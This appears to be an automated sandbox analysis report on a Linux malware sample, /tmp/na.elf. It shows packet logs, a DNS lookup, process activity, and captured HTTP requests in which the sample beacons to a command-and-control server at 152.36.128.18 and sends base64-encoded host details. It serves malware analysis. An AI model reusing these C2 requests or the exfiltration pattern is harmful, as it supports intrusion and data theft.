                                                              Mar 31, 2025 11:28:05.920370102 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:05.940068960 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:06.020492077 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:06.020658016 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:06.037940979 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:06.121469975 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:06.121536016 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:06.142266989 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:06.209882021 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:06.230349064 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:06.241684914 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:06.241791010 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:06.310025930 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:06.310051918 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:06.310157061 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:06.342370033 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:06.342392921 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:06.342519045 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:06.412158012 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:06.412189960 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:06.412372112 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:06.460525036 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:06.460586071 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:06.460706949 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:06.517987013 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:06.518023968 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:06.518115997 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:06.585797071 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:06.585819006 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:06.585916042 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:06.585916042 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:06.699732065 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:06.699831963 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:06.803200960 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:06.845803022 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:06.951047897 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:06.970638990 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:06.970747948 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:07.075181007 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:07.089359045 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:07.089512110 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:07.122438908 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:07.181766033 CEST4251680192.168.2.23109.202.202.202
                                                              Mar 31, 2025 11:28:07.185765982 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:07.190601110 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:07.190622091 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:07.190713882 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:07.285979986 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:07.285994053 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:07.286097050 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:07.312269926 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:07.312282085 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:07.312355042 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:07.382106066 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:07.382123947 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:07.382282019 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:07.408305883 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:07.408319950 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:07.408431053 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:07.442151070 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:07.477533102 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:07.477546930 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:07.477591991 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:07.501395941 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:07.501410961 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:07.501463890 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:07.545789003 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:07.579070091 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:07.579108953 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:07.579186916 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:07.599714994 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:07.599734068 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:07.599849939 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:07.681042910 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:07.681061029 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:07.681124926 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:07.681124926 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:07.693697929 CEST33610443192.168.2.2354.171.230.55
                                                              Mar 31, 2025 11:28:07.781765938 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:07.781898975 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:07.882443905 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:07.882477999 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:07.882514954 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:07.985306025 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:07.998083115 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:07.998191118 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:08.031162024 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:08.085685015 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:08.102262974 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:08.102287054 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:08.102427959 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:08.212292910 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:08.212311029 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:08.212379932 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:08.212379932 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:08.316584110 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:08.316725016 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:08.326545000 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:08.326602936 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:08.420264959 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:08.432147026 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:08.432280064 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:08.534885883 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:08.547964096 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:08.548018932 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:08.579190969 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:08.633559942 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:08.649272919 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:08.735469103 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:08.735586882 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:08.839343071 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:08.840068102 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:08.860543013 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:08.860667944 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:08.956079960 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:08.957163095 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:09.072166920 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:09.073283911 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:09.171648979 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:09.171715021 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:09.275100946 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:09.300126076 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:09.300194979 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:09.402100086 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:09.417957067 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:09.418005943 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:09.448613882 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:09.513453007 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:09.523406982 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:09.537297964 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:09.537466049 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:09.615525961 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:09.635551929 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:09.635632992 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:09.738085985 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:09.738168955 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:09.837212086 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:09.837301970 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:10.311291933 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:10.393326998 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:10.495090961 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:10.523335934 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:10.523477077 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:10.627808094 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:10.648619890 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:10.648761034 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:10.752129078 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:10.752387047 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:10.752481937 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:11.129744053 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:11.129869938 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:11.230648041 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:11.230720997 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:11.344050884 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:11.344151974 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:11.443607092 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:11.443684101 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:11.549015045 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:11.549082994 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:11.572856903 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:11.629173040 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:11.649620056 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:11.731535912 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:11.731751919 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:11.833623886 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:11.833728075 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:11.851536989 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:11.851608038 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:11.935280085 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:11.935369015 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:12.037375927 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:12.037450075 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:12.140671015 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:12.140747070 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:12.244379997 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:12.265326977 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:12.265379906 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:12.365016937 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:12.525023937 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:12.631675005 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:12.631730080 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:12.646162033 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:12.646219969 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:12.735024929 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:12.735116959 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:12.751590967 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:12.839389086 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:12.839463949 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:12.939335108 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:13.128933907 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:13.228677988 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:13.228760004 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:13.253892899 CEST5830480192.168.2.23152.36.128.18
                                                              Mar 31, 2025 11:28:13.330632925 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:13.330729961 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:13.396333933 CEST8058304152.36.128.18192.168.2.23
                                                              Mar 31, 2025 11:28:13.396408081 CEST5830480192.168.2.23152.36.128.18
                                                              Mar 31, 2025 11:28:13.405570030 CEST5830480192.168.2.23152.36.128.18
                                                              Mar 31, 2025 11:28:13.430505037 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:13.430576086 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:13.458600044 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:13.532603025 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:13.532666922 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:13.597337961 CEST8058304152.36.128.18192.168.2.23
                                                              Mar 31, 2025 11:28:13.644733906 CEST8058304152.36.128.18192.168.2.23
                                                              Mar 31, 2025 11:28:13.644845009 CEST5830480192.168.2.23152.36.128.18
                                                              Mar 31, 2025 11:28:13.656960964 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:13.657933950 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:13.693341970 CEST8058304152.36.128.18192.168.2.23
                                                              Mar 31, 2025 11:28:13.696918011 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:13.699968100 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:13.721481085 CEST5830480192.168.2.23152.36.128.18
                                                              Mar 31, 2025 11:28:13.756619930 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:13.756725073 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:13.778599024 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:13.778737068 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:13.857336998 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:13.863562107 CEST8058304152.36.128.18192.168.2.23
                                                              Mar 31, 2025 11:28:13.880296946 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:13.880409002 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:13.983760118 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:14.035706043 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:14.035880089 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:14.137624025 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:14.137734890 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:14.155577898 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:14.155632019 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:14.198957920 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:14.199214935 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:14.263417006 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:14.299141884 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:14.299211979 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:14.304306984 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:14.407718897 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:14.407823086 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:14.424563885 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:14.424679041 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:18.024987936 CEST5830680192.168.2.23152.36.128.18
                                                              Mar 31, 2025 11:28:18.171727896 CEST8058306152.36.128.18192.168.2.23
                                                              Mar 31, 2025 11:28:18.171791077 CEST5830680192.168.2.23152.36.128.18
                                                              Mar 31, 2025 11:28:18.180388927 CEST5830680192.168.2.23152.36.128.18
                                                              Mar 31, 2025 11:28:18.383096933 CEST8058306152.36.128.18192.168.2.23
                                                              Mar 31, 2025 11:28:18.426520109 CEST8058306152.36.128.18192.168.2.23
                                                              Mar 31, 2025 11:28:18.426805019 CEST5830680192.168.2.23152.36.128.18
                                                              Mar 31, 2025 11:28:18.489326954 CEST8058306152.36.128.18192.168.2.23
                                                              Mar 31, 2025 11:28:18.532295942 CEST5830680192.168.2.23152.36.128.18
                                                              Mar 31, 2025 11:28:18.801253080 CEST5830680192.168.2.23152.36.128.18
                                                              Mar 31, 2025 11:28:18.944425106 CEST8058306152.36.128.18192.168.2.23
                                                              Mar 31, 2025 11:28:20.255897999 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:20.255897999 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:20.357505083 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:20.357712984 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:20.357908964 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:20.358103991 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:20.358572960 CEST44355240199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:28:20.358656883 CEST55240443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:28:22.027750015 CEST43928443192.168.2.2391.189.91.42
                                                              Mar 31, 2025 11:28:31.136907101 CEST33610443192.168.2.2354.171.230.55
                                                              Mar 31, 2025 11:28:31.369353056 CEST4433361054.171.230.55192.168.2.23
                                                              Mar 31, 2025 11:28:32.266421080 CEST42836443192.168.2.2391.189.91.43
                                                              Mar 31, 2025 11:28:38.409596920 CEST4251680192.168.2.23109.202.202.202
                                                              Mar 31, 2025 11:29:02.982302904 CEST43928443192.168.2.2391.189.91.42
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Mar 31, 2025 11:30:19.920406103 CEST5633153192.168.2.238.8.8.8
                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Mar 31, 2025 11:30:19.920406103 CEST192.168.2.238.8.8.80x1873Standard query (0)xinchaodbcfda.comA (IP address)IN (0x0001)false
                                                              • 152.36.128.18
                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              0192.168.2.2358304152.36.128.1880
                                                              TimestampBytes transferredDirectionData
                                                              Mar 31, 2025 11:28:13.405570030 CEST76OUTGET /cgi-bin/p.cgi?r=22&i=162XYDVI8U344LH4 HTTP/1.0
                                                              Host: 152.36.128.18
                                                              Mar 31, 2025 11:28:13.644733906 CEST179INHTTP/1.1 200 OK
                                                              Date: Mon, 31 Mar 2025 09:28:13 GMT
                                                              Server: Apache/2.4.41 (Win64)
                                                              Content-Length: 7
                                                              Connection: close
                                                              Content-Type: text/html; charset=windows-1251
                                                              Data Raw: 73 79 73 69 6e 66 6f
                                                              Data Ascii: sysinfo


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1192.168.2.2358306152.36.128.1880
                                                              TimestampBytes transferredDirectionData
                                                              Mar 31, 2025 11:28:18.180388927 CEST691OUTGET /cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCjMwNjQyOTYga0INCnZtd2FyZQ0KDQoNCg0KVWJ1bnR1ICYgMjAuMDQuMiBMVFMgKEZvY2FsIEZvc3NhKSAgJiBidWxsc2V5ZS9zaWQgJiANCg0KL3Vzci9zYmluLw0KIyBkbWlkZWNvZGUgMy4yfDE3NDM0MTMyOTYNCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=162XYDVI8U344LH4&h=galassia&enckey=NJo+BXgl1KsHxJmSQmN45beSwdCJidQTG2ru7xSmYKmlGhTrNT5KOOqpUgArbJ1t53AQnwnWLEPhF4POrFhXa4Sx4DZSZDY489p8V/yvdQCnQ1gkqzX4AKK76rphc5ovH+LWZa2zkMxk7TqZDLY0aCtaWNn0gYeymSI/bsJxTy8= HTTP/1.0
                                                              Host: 152.36.128.18
                                                              Mar 31, 2025 11:28:18.426520109 CEST224INHTTP/1.1 200 OK
                                                              Date: Mon, 31 Mar 2025 09:28:18 GMT
                                                              Server: Apache/2.4.41 (Win64)
                                                              Content-Length: 3
                                                              Connection: close
                                                              Content-Type: text/html; charset=windows-1251
                                                              Data Raw: 6f 6b 21 0d 0a 43 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 0a 0a
                                                              Data Ascii: ok!Content-type: text/html; charset=windows-1251


                                                              System Behavior

                                                              Start time (UTC):09:28:00
                                                              Start date (UTC):31/03/2025
                                                              Path:/tmp/na.elf
                                                              Arguments:/tmp/na.elf
                                                              File size:435932 bytes
                                                              MD5 hash:eccb01bcdff87829f8e499f453ad4629

                                                              Start time (UTC):09:28:00
                                                              Start date (UTC):31/03/2025
                                                              Path:/tmp/na.elf
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:eccb01bcdff87829f8e499f453ad4629

                                                              Start time (UTC):09:28:00
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c "pgrep na.elf"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:00
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:00
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/pgrep
                                                              Arguments:pgrep na.elf
                                                              File size:30968 bytes
                                                              MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                              Start time (UTC):09:28:01
                                                              Start date (UTC):31/03/2025
                                                              Path:/tmp/na.elf
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:eccb01bcdff87829f8e499f453ad4629

                                                              Start time (UTC):09:28:01
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c "pgrep uplugplay"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:01
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:01
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/pgrep
                                                              Arguments:pgrep uplugplay
                                                              File size:30968 bytes
                                                              MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                              Start time (UTC):09:28:02
                                                              Start date (UTC):31/03/2025
                                                              Path:/tmp/na.elf
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:eccb01bcdff87829f8e499f453ad4629

                                                              Start time (UTC):09:28:02
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c "pidof uplugplay"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:02
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:03
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/pidof
                                                              Arguments:pidof uplugplay
                                                              File size:27016 bytes
                                                              MD5 hash:f58f67968fc50f1497f9ea9e9c22b6e8

                                                              Start time (UTC):09:28:04
                                                              Start date (UTC):31/03/2025
                                                              Path:/tmp/na.elf
                                                              Arguments:-
